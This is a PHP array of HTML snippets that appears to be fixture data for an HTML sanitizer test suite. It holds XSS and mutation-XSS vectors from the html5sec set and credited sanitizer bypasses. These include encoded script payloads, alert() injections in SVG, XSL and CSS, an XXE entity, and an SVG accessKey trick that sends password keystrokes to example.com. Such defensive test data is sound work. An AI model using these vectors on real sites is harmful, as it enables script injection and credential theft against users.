<?php
return [
0 => '<svg><image id="v-146" width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink" 0 0 100 100" height="100" width="100" xmlns="http://www.w3.org/2000/svg" data-name="Layer 1" id="Layer_1">
<title>Compute</title>
<g>
<rect fill="#9d5025" ry="9.12" rx="9.12" height="53" width="53" y="24.74" x="23.5"></rect>
<rect fill="#f58536" ry="9.12" rx="9.12" height="53" width="53" y="22.26" x="23.5"></rect>
</g>
</svg>" preserveratio="true" style="border-color: rgb(51, 51, 51); box-sizing: border-box; color: rgb(51, 51, 51); cursor: move; font-family: sans-serif; font-size: 14px; line-height: 20px; outline-color: rgb(51, 51, 51); text-size-adjust: 100%; column-rule-color: rgb(51, 51, 51); -webkit-font-smoothing: antialiased; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); -webkit-text-emphasis-color: rgb(51, 51, 51); -webkit-text-fill-color: rgb(51, 51, 51); -webkit-text-stroke-color: rgb(51, 51, 51); user-select: none; vector-effect: non-scaling-stroke;"></image></svg>',
1 => '<svg><image id="v-146" width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink" href="data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" height="100" width="100" xmlns="http://www.w3.org/2000/svg" data-name="Layer 1" id="Layer_1">
<title>Compute</title>
<g>
<rect fill="#9d5025" ry="9.12" rx="9.12" height="53" width="53" y="24.74" x="23.5"></rect>
<rect fill="#f58536" ry="9.12" rx="9.12" height="53" width="53" y="22.26" x="23.5"></rect>
</g>
</svg>" preserveratio="true" style="border-color: rgb(51, 51, 51); box-sizing: border-box; color: rgb(51, 51, 51); cursor: move; font-family: sans-serif; font-size: 14px; line-height: 20px; outline-color: rgb(51, 51, 51); text-size-adjust: 100%; column-rule-color: rgb(51, 51, 51); -webkit-font-smoothing: antialiased; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); -webkit-text-emphasis-color: rgb(51, 51, 51); -webkit-text-fill-color: rgb(51, 51, 51); -webkit-text-stroke-color: rgb(51, 51, 51); user-select: none; vector-effect: non-scaling-stroke;"></image></svg>',
2 => '<div aria-labelledby="msg--title" role="dialog" class="msg"><button class="modal-close" aria-label="close" type="button"><i class="icon-close"></i>some button</button></div>',
3 => '<input type=checkbox checked><input type=checkbox onclick>',
4 => '<svg><defs><filter id="f1"><feGaussianBlur in="SourceGraphic" stdDeviation="15" /></filter></defs><rect width="90" height="90" stroke="green" stroke-width="3" fill="yellow" filter="url(#f1)" /></svg>',
5 => '<b href="(1)" title="(2)"></b>',
6 => '<img src=""><audio src=""></audio><video src=""></video><source src=""><div src="data:,345">',
7 => '<img ><img >',
8 => '<img >',
9 => '123<a href=\'
(1)\'>I am a dolphin!</a>',
10 => '123<a href=\'
(1)\'>I am a dolphin too!</a>',
11 => '123<a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\'?(1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a><a href=\' (1)\'>CLICK</a>',
12 => '<img >',
13 => '<img src="">',
14 => '<img src=\'(1){}\'>',
15 => '<a >clickme</a>',
16 => '123456',
17 => '<form ><input name="attributes"><input name="attributes">',
18 => '<img >',
19 => '<a href="#some-code-here" id="location">invisible',
20 => '<div ><form ><input name=parentNode>123</form></div>',
21 => '<form ><input name=nodeName>123</form>',
22 => '<form ><input name=nodeType>123</form>',
23 => '<form ><input name=children>123</form>',
24 => '<form ><input name=attributes>123</form>',
25 => '<form ><input name=removeChild>123</form>',
26 => '<form ><input name=removeAttributeNode>123</form>',
27 => '<form ><input name=setAttribute>123</form>',
28 => '<style>*{color: red}</style>',
29 => '<p>hello</p>',
30 => '<listing><img ="alert(1);//" src=x><t t></listing>',
31 => '<img >',
32 => '<textarea>@shafigullin</textarea><!--</textarea><img >-->',
33 => '<b><noscript><!-- </noscript><img ></noscript>',
34 => '<b><noscript><a >"></noscript>',
35 => '<body><template><s><template><s><img >@shafigullin</s></template></s></template>',
36 => '<a href="(1)">@shafigullin<a>',
37 => '<option><style></option></select><b><img ></style></option>',
38 => '<option><iframe></select><b>',
39 => '</iframe></option>',
40 => '<b><style><style/><img >',
41 => '<b><style><style////><img ></style>',
42 => '<math xmlns="http://www.w3.org/1998/Math/MathML" display="block">
<mrow>
<menclose notation="box"><mi>a</mi></menclose><mo>,</mo>
<menclose notation="box"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
<menclose notation="box" mathcolor="#FF0000"><mi>a</mi></menclose><mo>,</mo>
<menclose notation="box" mathbackground="#80FF80"><mi mathcolor="#FF0000">a</mi></menclose><mo>,</mo>
<menclose notation="box" mathcolor="#FF0000" mathbackground="#80FF80"><mi>a</mi></menclose><mo>,</mo>
<menclose notation="box"><mi mathbackground="#80FF80">a</mi></menclose>
</mrow>
</math>',
43 => '<image name=body><image name=adoptNode>@mmrupp<image name=firstElementChild><svg >',
44 => '<a href="(1)">@shafigullin<a>',
45 => '<image name=activeElement><svg >',
46 => '<image name=body><img ><>, <>',
47 => '<div x=yscript: n>@superevr</div>',
48 => '<button remove=me >@giutro',
49 => '<a href="">CLICK ME (bypass by @shafigullin)</a>',
50 => '<isindex x="" label="variation of bypass by @giutro">',
51 => '<div wow=removeme >text',
52 => '<input x=(1)><svg id=1 ></svg>',
53 => '<isindex src="" label="bypass by @giutro" />',
54 => '<a href="">CLICK ME (bypass by @shafigullin)</a>',
55 => '<form action="(1)"><button>XXX</button></form>',
56 => '<div id="1"><form id="foobar"></form><button >X</button>//["\'`-->]]>]</div>',
57 => '<div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["\'`-->]]>]</div>',
58 => '<div id="3"><meta charset="x-imap4-modified-utf7">&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["\'`-->]]>]</div>',
59 => '<div id="4">0? :postMessage(importScripts(cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk\'))//["\'`-->]]>]</div>',
60 => '<div id="5">//["\'`-->]]>]</div>',
61 => '<div id="6">//["\'`-->]]>]</div>',
62 => '<div id="7"><input autofocus>//["\'`-->]]>]</div>',
63 => '<div id="8"><input autofocus><input autofocus>//["\'`-->]]>]</div>',
64 => '<div id="9"><a >X</a>//["\'`-->]]>]</div>
<div id="10"><video //></video>//["\'`-->]]>]</div>',
65 => '<div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g ></g></svg>//["\'`-->]]>]</div>',
66 => '<div id="12"><body ><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["\'`-->]]>]</div>',
67 => '<div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["\'`-->]]>]</div>',
68 => '<div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["\'`-->]]>]</div>',
69 => '<div id="15">//["\'`-->]]>]</div>',
70 => '<div id="16">X<x >//["\'`-->]]>]</div>',
71 => '<div id="17"><?xml-stylesheet href="(17)"?><root/>//["\'`-->]]>]</div>',
72 => '<div id="18">alert(1)//["\'`-->]]>]</div>',
73 => '<div id="19"><meta charset="x-mac-farsi">]]>]</div>',
74 => '<div id="20">//["\'`-->]]>]</div>',
75 => '<div id="21">//["\'`-->]]>]</div>',
76 => '<div id="22"><input autofocus><input>//["\'`-->]]>]</div>',
77 => '<div id="23"><form id=foobar ><input></form><button >X</button>//["\'`-->]]>]</div>',
78 => '<div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` attributename=`innerhtml` to=`<img/src="x">`>//["\'`-->]]>]</div>',
79 => '<div id="25">{alert(25)};1//["\'`-->]]>]</div>',
80 => '<div id="26"><html><body><div>top secret</div></body></html>.toXMLString().match(/.*/m),alert(RegExp.input);//["\'`-->]]>]</div>',
81 => '<div id="27"><style>p[foo=bar{}*{-o-link:\'(27)\'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["\'`-->]]>]</div><div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time attributename=innerhtml values=<img/src=".">>//["\'`-->]]>]</div>',
82 => '<div id="29"><link rel=stylesheet href=data:,*%7bx:alert(29))%7d//["\'`-->]]>]</div>',
83 => '<div id="30"><style>@import "data:,*%7bx:alert(30))%7D";</style>//["\'`-->]]>]</div>',
84 => '<div id="31"><frameset >//["\'`-->]]>]</div>',
85 => '<div id="32"><table background="(32)"></table>//["\'`-->]]>]</div>',
86 => '<div id="33"><a ><a >XXX</a></a><a href="(2)">XXX</a>//["\'`-->]]>]</div>',
87 => '<div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml src=test.vml#xss></vmlframe>//["\'`-->]]>]</div>',
88 => '<div id="35">1<a ><line xmlns=urn:schemas-microsoft-com:vml href=(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["\'`-->]]>]</div>',
89 => '<div id="36"><a folder="(36)">XXX</a>//["\'`-->]]>]</div>',
90 => '<div id="37"><!--<img ><img ">//["\'`-->]]>]</div>',
91 => '<div id="38"><comment><img ><img ">//["\'`-->]]>]</div><div id="39"><!-- up to Opera 11.52, FF 3.6.28 -->',
92 => '<![><img ><img ">',
93 => '<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->
<svg><![CDATA[><image ></svg>//["\'`-->]]>]</div>',
94 => '<div id="40"><style><img src="</style><img ">//["\'`-->]]>]</div>',
95 => '<div id="41"><li ></li>',
96 => '<div >);visibility:hidden =alert(41)></div>//["\'`-->]]>]</div>',
97 => '<div id="42"><head><base href="//"/></head><body><a href="/. /,alert(42)//#">XXX</a></body>//["\'`-->]]>]</div>',
98 => '<div id="43"><?xml version="1.0" standalone="no"?>',
99 => '<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
</style>
</head>
<body>Hello</body>
</html>//["\'`-->]]>]</div>',
100 => '<div id="44"><style>*[{}@import\'test.css?]{color: green;}</style>X//["\'`-->]]>]</div>',
101 => '<div id="45"><div >XXX</div>//["\'`-->]]>]</div>',
102 => '<div id="46"><div >XXX</div>//["\'`-->]]>]</div>',
103 => '<div id="47"><svg xmlns="http://www.w3.org/2000/svg"></svg>//["\'`-->]]>]</div>',
104 => '<div id="48">alert(48)//["\'`-->]]>]</div>',
105 => '<div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="(49)"></OBJECT>//["\'`-->]]>]</div>',
106 => '<div id="50"><object data="PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["\'`-->]]>]</div>',
107 => '<div id="51"><embed src="PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["\'`-->]]>]</div>',
108 => '<div id="52"><x >//["\'`-->]]>]</div><div id="53"><xml id="xss" src="test.htc"></xml>',
109 => '<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["\'`-->]]>]</div>',
110 => '<div id="54">//["\'`-->]]>]</div>',
111 => '<div id="55"><video>< >//["\'`-->]]>]</div>',
112 => '<div id="56"><video ><source></source></video>//["\'`-->]]>]</div>',
113 => '<div id="57"><b 0</b>//["\'`-->]]>]</div>',
114 => '<div id="58"><b></b><alert(58)</b></b>//["\'`-->]]>]</div>',
115 => '<div id="59"><div id="div1"><input value="``=alert(59)"></div> <div id="div2"></div>//["\'`-->]]>]</div>',
116 => '<div id="60"><div >XXX</div>//["\'`-->]]>]</div>',
117 => '<div id="62"><!-- IE 6-8 -->
<x \'="foo"><x foo=\'><img >
& foo=\'><img \'',
118 => '<div id="63"><embed src="(63)"></embed> // O10.10?, OM10.0?, GC6?, FF
<img src="(2)">
<image src="(2)"> // IE6, O10.10?, OM10.0?
// IE6, O11.01?, OM10.1?//["\'`-->]]>]</div>',
119 => '<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["\'`-->]]>]</div>',
120 => '<div id="65"><svg xmlns="http://www.w3.org/2000/svg"></svg>//["\'`-->]]>]</div><div id="66"><?xml version="1.0"?>',
121 => '<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version=\'1.0\' xmlns:xsl=\'http://www.w3.org/1999/XSL/Transform\' id=\'xss\'%3E%3Cxsl:output method=\'html\'/%3E%3Cxsl:template match=\'/\'%3E
<root/>//["\'`-->]]>]</div>
<div id="67"><!DOCTYPE x [
<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx"
CDATA "alert(67)"
CDATA "alert(2)">
]><img />//["\'`-->]]>]</div>',
122 => '<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">
<html:style /><x xlink:type="simple">XXX</x>
</doc>//["\'`-->]]>]</div>',
123 => '<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type=""><go href="(69)"/></onevent><timer value="1"/></card>//["\'`-->]]>]</div>',
124 => '<div id="70"><div >x</div>//["\'`-->]]>]</div>',
125 => '<div id="71"><// >//["\'`-->]]>]</div>',
126 => '<div id="72"><form><button >X</button>//["\'`-->]]>]</div>',
127 => '<div id="73"><event-source src="event.php" >//["\'`-->]]>]</div>',
128 => '<div id="74"><a href="(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["\'`-->]]>]</div>',
129 => '<div id="75"></>//["\'`-->]]>]</div>',
130 => '<div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["\'`-->]]>]</div>',
131 => '<div id="77"><?xml-stylesheet type="text/css"?><root />//["\'`-->]]>]</div>',
132 => '<div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["\'`-->]]>]</div>',
133 => '<div id="79"><object allowscriptaccess="always" data="x"></object>//["\'`-->]]>]</div>',
134 => '<div id="80"><style>*{x:??????????(alert(80))}</style>//["\'`-->]]>]</div>',
135 => '<div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="" xlink:type="simple"/>//["\'`-->]]>]</div>',
136 => '<div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:write(2));%7d"?>//["\'`-->]]>]</div><div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:><x:timer value="1"/></x:template>//["\'`-->]]>]</div>',
137 => '<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="(84)//#x"/>//["\'`-->]]>]</div>',
138 => '<div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["\'`-->]]>]</div>',
139 => '<div id="86"><body ><input autofocus>//["\'`-->]]>]</div><div id="87"><svg xmlns="http://www.w3.org/2000/svg">
<a xlink="http://www.w3.org/1999/xlink"href="(87)"><rect width="1000" height="1000" fill="white"/></a>
</svg>//["\'`-->]]>]</div>',
140 => '<div id="89"><svg xmlns="http://www.w3.org/2000/svg">
<set attributeName="" to="alert(89)"/>
<animate attributeName="" to="alert(89)"/>
</svg>//["\'`-->]]>]</div>',
141 => '<div id="90"><!-- Up to Opera 10.63 -->
<div ></div>
<!-- Up to Opera 11.64 - see link below -->
<!-- Up to Opera 12.x -->
<div >PRESS ENTER</div>//["\'`-->]]>]</div>',
142 => '<div id="91">[A]
<? foo=">">
<! foo=">">
</ foo=">">
[B]
<? foo="><x foo=\'?>\'>">
[C]
<! foo="[[[x]]"><x foo="]foo>">
[D]
<% foo><x foo="%>">//["\'`-->]]>]</div>',
143 => '<div id="92"><div >X</div>//["\'`-->]]>]</div>',
144 => '<div id="93"><div >X</div>//["\'`-->]]>]</div>',
145 => '<div id="94"><svg xmlns="http://www.w3.org/2000/svg">
<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler>
</svg>//["\'`-->]]>]</div>',
146 => '<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<feImage>
<set attributeName="xlink:href" to="
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg=="/>
</feImage>
</svg>//["\'`-->]]>]</div>',
147 => '<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>
<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["\'`-->]]>]</div>',
148 => '<div id="97"><!-- IE 5-9 -->
<div id=d><x xmlns="><iframe "></div>
<!-- IE 10 in IE5-9 Standards mode -->
<div id=d><x xmlns=\'"><iframe \'></div>
//["\'`-->]]>]</div>',
149 => '<div id="98"><div id=d><div >X</div></div>
//["\'`-->]]>]</div>',
150 => '<div id="99">XXX<style>
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
<!--
--><!--*{color:red} /* all UA */
*{background:url(xx //**/' . "\r" . 'ed/*)} /* IE 6-7 Standards mode */
</style>//["\'`-->]]>]</div>',
151 => '<div id="100"><img[>//["\'`-->]]>]</div>',
152 => '<div id="101"><a href="">XXX</a>//["\'`-->]]>]</div>',
153 => '<div id="102"><img src="x` `">//["\'`-->]]>]</div>',
154 => '<div id="103">//["\'`-->]]>]</div><div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo">
<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg">
<handler xml:id="bar" type="application/ecmascript"> alert(104) </handler>
</svg>
#bar"/>
</svg>//["\'`-->]]>]</div>',
155 => '<div id="105"><iframe src="data:image/svg-xml,%8B%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2"></iframe>//["\'`-->]]>]</div>',
156 => '<div id="106"><img >//["\'`-->]]>]</div>',
157 => '<div id="107"><title ></title><title title=></title>//["\'`-->]]>]</div>',
158 => '<div id="108"><!-- IE 5-8 standards mode -->
<a ></a><img ><img ></a>">
<!-- IE 5-9 standards mode -->
<!a foo=x=`y><img ><img ">
<?a foo=x=`y><img ><img ">//["\'`-->]]>]</div>',
159 => '<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
<rect fill="white" />
</svg>//["\'`-->]]>]</div>',
160 => '<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
<path d="M0,0" />
</svg>//["\'`-->]]>]</div>',
161 => '<div id="111"><div >X</div>//["\'`-->]]>]</div>',
162 => '<div id="112"><div >X</div>//["\'`-->]]>]</div><div id="113"><div id="x">XXX</div>
<style>
#x{font-family:foo[bar;color:green;}
#y];color:red;{}
</style>//["\'`-->]]>]</div>',
163 => '<div id="114"><x >XXX</x>//["\'`-->]]>]</div><div id="115"><!--[if]>
<!--[if<img > -->//["\'`-->]]>]</div>',
164 => '<div id="116"><div id="x">x</div>
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="<img >">//["\'`-->]]>]</div>',
165 => '<div id="117"><a href="http://attacker.org">
<iframe src="http://example.org/"></iframe>
</a>//["\'`-->]]>]</div>',
166 => '<div id="118"><div draggable="true" >
<h1>Drop me</h1>
</div>
<iframe src="http://www.example.org/dropHere.html"></iframe>//["\'`-->]]>]</div>',
167 => '<div id="119"><iframe src="//www.example.org/" frameborder="0" ></iframe>',
168 => '<textarea type="text" cols="50" rows="10"></textarea>//["\'`-->]]>]</div>',
169 => '<div id="120">
<body>
<a href="#">Spam</a>//["\'`-->]]>]</div>',
170 => '<div id="121"><html xmlns="http://www.w3.org/1999/xhtml"
xmlns:svg="http://www.w3.org/2000/svg">
<body >
<iframe src="http://example.com/" />
<svg:svg>
<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">
<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>
<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>
</svg:mask>
</svg:svg>
</body>
</html>//["\'`-->]]>]</div>',
171 => '<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["\'`-->]]>]</div>',
172 => '<div id="123"><span class=foo>Some text</span>
<a href="http://www.example.org">www.example.org</a>
//["\'`-->]]>]</div>',
173 => '<div id="124"> // Safari 5.0, Chrome 9, 10
// Safari 5.0//["\'`-->]]>]</div>',
174 => '<div id="125"><?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="(125)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle></svg>//["\'`-->]]>]</div>',
175 => '<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" ><param name=postdomevents /></object>//["\'`-->]]>]</div>',
176 => '<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">
<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
<handler id="y">alert(127)</handler>
</svg>//["\'`-->]]>]</div>',
177 => '<div id="128"><svg><style><img/>//["\'`-->]]>]</div>',
178 => '<div id="129"><svg><image >
<!--
Same effect with
<image filter=\'...\'>
-->
</svg>//["\'`-->]]>]</div>',
179 => '<div id="130"><math href="(130)">CLICKME</math>
<math>
<!-- up to FF 13 -->
<maction actiontype="statusline#http://google.com" >CLICKME</maction>
<!-- FF 14+ -->
<maction actiontype="statusline" >CLICKME<mtext>http://http://google.com</mtext></maction>
</math>//["\'`-->]]>]</div>',
180 => '<div id="132"><!DOCTYPE html>
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input name="secret" type="password">
</form>
<!-- injection --><svg height="50px">
<image xmlns:xlink="http://www.w3.org/1999/xlink">
<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
</image>
</svg>//["\'`-->]]>]</div>',
181 => '<div id="133"><!-- `<img/>//["\'`-->]]>]</div>',
182 => '<div id="134"><xmp>
<%
</xmp>
<img ></xmp><img \'>
%>/
alert(2)
XXX
<style>
*[\'<!--\']{}
</style>
-->{}
*{color:red}</style>//["\'`-->]]>]</div>',
183 => '<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?>
<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">
<template match="/">
<eval>new ActiveXObject(\'htmlfile\').parentWindow.alert(135)</eval>
<if expr="new ActiveXObject(\'htmlfile\').parentWindow.alert(2)"></if>
</template>
</stylesheet>//["\'`-->]]>]</div>',
184 => '<div id="136"><form action="x" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="injected" value="injected" dirname="password" />
<input type="submit">
</form>//["\'`-->]]>]</div>',
185 => '<div id="137"><svg>
<a xlink="http://www.w3.org/1999/xlink"href="?">
<circle r="400"></circle>
<animate attributeName="xlink:href" begin="0" from="(137)" to="&" />
</a>//["\'`-->]]>]</div>',
186 => '<img name="bar" id="foo">',
187 => '<input name=submit>123',
188 => '<input name=acceptCharset>123',
189 => '<img src="small.jpg" srcset="medium.jpg 1000w, large.jpg 2000w">',
190 => '<div =""></div>',
191 => '<x/><title>&lt;/title&gt;&lt;img src=1 =alert(1)>',
192 => '<svg></p><textarea><title><style></textarea><img ></style></title></svg>',
193 => '<math></p><textarea><mi><style></textarea><img ></mi></math>',
194 => '<svg></p><title><template><style></title><img >',
195 => '<math></br><textarea><mtext><template><style></textarea><img >',
196 => '<form><input name=namespaceURI>',
197 => '<svg></p><math><title><style><img ></style></title>',
198 => '<svg></p><style><g title="</style><img >">',
199 => '<svg><foreignobject><p><style><p title="</style><iframe "></style>',
200 => '<math><annotation-xml encoding="text/html"><p><style><p title="</style><iframe "></style>',
201 => '<xmp><svg><b><style><b title=\'</style><img>\'>',
202 => '<noembed><svg><b><style><b title=\'</style><img>\'>',
203 => ' ',
];
|